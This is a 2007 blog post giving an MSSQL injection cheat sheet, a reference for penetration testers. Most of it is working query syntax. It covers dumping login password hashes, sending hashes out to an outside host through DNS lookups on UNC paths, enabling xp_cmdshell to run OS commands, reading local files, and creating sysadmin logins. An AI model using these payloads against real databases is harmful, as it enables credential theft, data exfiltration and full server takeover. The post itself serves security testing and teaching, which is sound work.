header image
Home arrow Blog arrow MSSQL Injection Cheat Sheet
MSSQL Injection Cheat Sheet
Nov 27, 2007 at 08:23 PM
Some useful syntax reminders for SQL Injection into MSSQL databases...


This post is part of a series of SQL Injection Cheat Sheets.  In this series, I've endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend.  This helps to highlight any features which are lacking for each database, and enumeration techniques that don't apply and also areas that I haven't got round to researching yet.

The complete list of SQL Injection Cheat Sheets I'm working is:

I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here.

Some of the queries in the table below can only be run by an admin. These are marked with "-- priv" at the end of the query. 

Version
SELECT @@version
Comments SELECT 1 -- comment
SELECT /*comment*/1
Current User
SELECT user_name();
SELECT system_user();
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
List UsersSELECT name FROM master..syslogins
List Password Hashes
SELECT name, password FROM master..sysxlogins -- priv, mssql 2000;
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- priv, mssql 2000.  Need to convert to hex to return hashes in MSSQL error message.
SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005;
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -- priv, mssql 2005
List PrivilegesTODO
List DBA AccountsTODO
Current Database  SELECT DB_NAME() 
List Databases SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...
List Columns
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable')
List Tables SELECT name FROM master..sysobjects WHERE xtype = 'U'
Find Tables From Column Name -- NB: This example works only for the current database.  If you wan't to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- this lists table, column for each column containing the word 'password'
Select Nth RowSELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row 
Select Nth Char
SELECT substring('abcd', 3, 1) -- returns c
Bitwise AND 
SELECT 6 & 2 -- returns 2
SELECT 6 & 1 -- returns 0

ASCII Value -> Char

SELECT char(0x41) -- returns A
Char -> ASCII ValueSELECT ascii('A') - returns 65
CastingSELECT CAST('1' as int);
SELECT CAST(1 as char)
String ConcatenationSELECT 'A' + 'B' - returns AB

If Statement

IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1

Case StatementSELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1
Avoiding Quotes
SELECT char(65)+char(66) -- returns AB
Time Delay 
 WAITFOR DELAY '0:0:5' -- pause for 5 seconds
Make DNS Requests

declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); -- nonpriv, works on 2000

declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini'''); -- priv, works on 2005

-- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host.  Messy but necessary. 

Command Execution

EXEC xp_cmdshell 'net user'; -- priv

On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
EXEC sp_configure 'show advanced options', 1; -- priv
RECONFIGURE; -- priv
EXEC sp_configure 'xp_cmdshell', 1; -- priv
RECONFIGURE; -- priv

Local File Access
CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM 'c:\boot.ini';
DROP TABLE mydata;
Hostname, IP AddressSELECT HOST_NAME()
Create UsersEXEC sp_addlogin 'user', 'pass'; -- priv
Drop UsersEXEC sp_droplogin 'user'; -- priv
Make User DBAEXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; -- priv
 Location of DB files
TODO
Last Updated ( Aug 18, 2008 at 01:56 PM )